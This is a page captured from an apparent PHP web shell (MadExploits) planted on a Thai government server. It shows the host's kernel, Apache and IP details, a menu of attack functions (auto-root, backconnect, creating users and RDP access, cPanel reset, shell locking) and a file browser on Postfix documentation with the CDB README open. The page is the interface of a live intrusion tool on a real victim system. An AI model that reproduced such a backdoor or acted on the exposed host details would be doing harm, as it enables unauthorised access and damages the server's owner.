Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
postfix-2.6.6 /
README_FILES /
[ HOME SHELL ]
Name
Size
Permission
Action
AAAREADME
2.7
KB
-rw-r--r--
ADDRESS_CLASS_README
9.33
KB
-rw-r--r--
ADDRESS_REWRITING_README
42.68
KB
-rw-r--r--
ADDRESS_VERIFICATION_README
19.46
KB
-rw-r--r--
BACKSCATTER_README
12.3
KB
-rw-r--r--
BASIC_CONFIGURATION_README
20.73
KB
-rw-r--r--
BUILTIN_FILTER_README
13.94
KB
-rw-r--r--
CDB_README
2.69
KB
-rw-r--r--
CONNECTION_CACHE_README
8.96
KB
-rw-r--r--
CONTENT_INSPECTION_README
3.29
KB
-rw-r--r--
DATABASE_README
13.25
KB
-rw-r--r--
DB_README
6.9
KB
-rw-r--r--
DEBUG_README
17.71
KB
-rw-r--r--
DSN_README
4.33
KB
-rw-r--r--
ETRN_README
11.4
KB
-rw-r--r--
FILTER_README
27.04
KB
-rw-r--r--
INSTALL
32.72
KB
-rw-r--r--
IPV6_README
11.73
KB
-rw-r--r--
LDAP_README
19.83
KB
-rw-r--r--
LINUX_README
1.64
KB
-rw-r--r--
LOCAL_RECIPIENT_README
5.65
KB
-rw-r--r--
MAILDROP_README
5.16
KB
-rw-r--r--
MILTER_README
36.6
KB
-rw-r--r--
MULTI_INSTANCE_README
42.4
KB
-rw-r--r--
MYSQL_README
4.31
KB
-rw-r--r--
NFS_README
4.73
KB
-rw-r--r--
OVERVIEW
18.57
KB
-rw-r--r--
PACKAGE_README
5.45
KB
-rw-r--r--
PCRE_README
2.87
KB
-rw-r--r--
PGSQL_README
4.4
KB
-rw-r--r--
QSHAPE_README
36.13
KB
-rw-r--r--
RELEASE_NOTES
12.37
KB
-rw-r--r--
RESTRICTION_CLASS_README
6.71
KB
-rw-r--r--
SASL_README
23.29
KB
-rw-r--r--
SCHEDULER_README
65.06
KB
-rw-r--r--
SMTPD_ACCESS_README
15.41
KB
-rw-r--r--
SMTPD_POLICY_README
19.37
KB
-rw-r--r--
SMTPD_PROXY_README
10.47
KB
-rw-r--r--
STANDARD_CONFIGURATION_README
25.24
KB
-rw-r--r--
STRESS_README
19.62
KB
-rw-r--r--
TLS_LEGACY_README
51.46
KB
-rw-r--r--
TLS_README
96.1
KB
-rw-r--r--
TUNING_README
23.76
KB
-rw-r--r--
ULTRIX_README
1.96
KB
-rw-r--r--
UUCP_README
5.14
KB
-rw-r--r--
VERP_README
7
KB
-rw-r--r--
VIRTUAL_README
23.29
KB
-rw-r--r--
XCLIENT_README
9.39
KB
-rw-r--r--
XFORWARD_README
8.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CDB_README
PPoossttffiixx CCDDBB HHoowwttoo ------------------------------------------------------------------------------- IInnttrroodduuccttiioonn CDB (Constant DataBase) is an indexed file format designed by Daniel Bernstein. CDB is optimized exclusively for read access and guarantees that each record will be read in at most two disk accesses. This is achieved by forgoing support for incremental updates: no single-record inserts or deletes are supported. CDB databases can be modified only by rebuilding them completely from scratch, hence the "constant" qualifier in the name. Postfix CDB databases are specified as "cdb:name", where name specifies the CDB file name without the ".cdb" suffix (another suffix, ".tmp", is used temporarily while a CDB file is under construction). CDB databases are maintained with the postmap(1) or postalias(1) command. The DATABASE_README document has general information about Postfix databases. CDB support is available with Postfix 2.2 and later releases. This document describes how to build Postfix with CDB support. BBuuiillddiinngg PPoossttffiixx wwiitthh CCDDBB ssuuppppoorrtt These instructions assume that you build Postfix from source code as described in the INSTALL document. Some modification may be required if you build Postfix from a vendor-specific source package. Postfix is compatible with two CDB implementations: * The original cdb library from Daniel Bernstein, available from http:// cr.yp.to/cdb.html, and * tinycdb (version 0.5 and later) from Michael Tokarev, available from http:/ /www.corpit.ru/mjt/tinycdb.html. Tinycdb is preferred, since it is a bit faster, has additional useful functionality and is much simpler to use. To build Postfix after you have installed tinycdb, use something like: % make tidy % CDB=../../../tinycdb-0.5 % make -f Makefile.init makefiles "CCARGS=-DHAS_CDB -I$CDB" \ "AUXLIBS=$CDB/libcdb.a" % make Alternatively, for the D.J.B. version of CDB: % make tidy % CDB=../../../cdb-0.75 % make -f Makefile.init makefiles "CCARGS=-DHAS_CDB -I$CDB" \ "AUXLIBS=$CDB/cdb.a $CDB/alloc.a $CDB/buffer.a $CDB/unix.a $CDB/byte.a" % make After Postfix has been built with cdb support, you can use "cdb" tables wherever you can use read-only "hash", "btree" or "dbm" tables. However, the "ppoossttmmaapp --ii" (incremental record insertion) and "ppoossttmmaapp --dd" (incremental record deletion) command-line options are not available. For the same reason the "cdb" map type cannot be used to store the persistent address verification cache for the verify(8) service, or to store TLS session information for the tlsmgr(8) service.
Close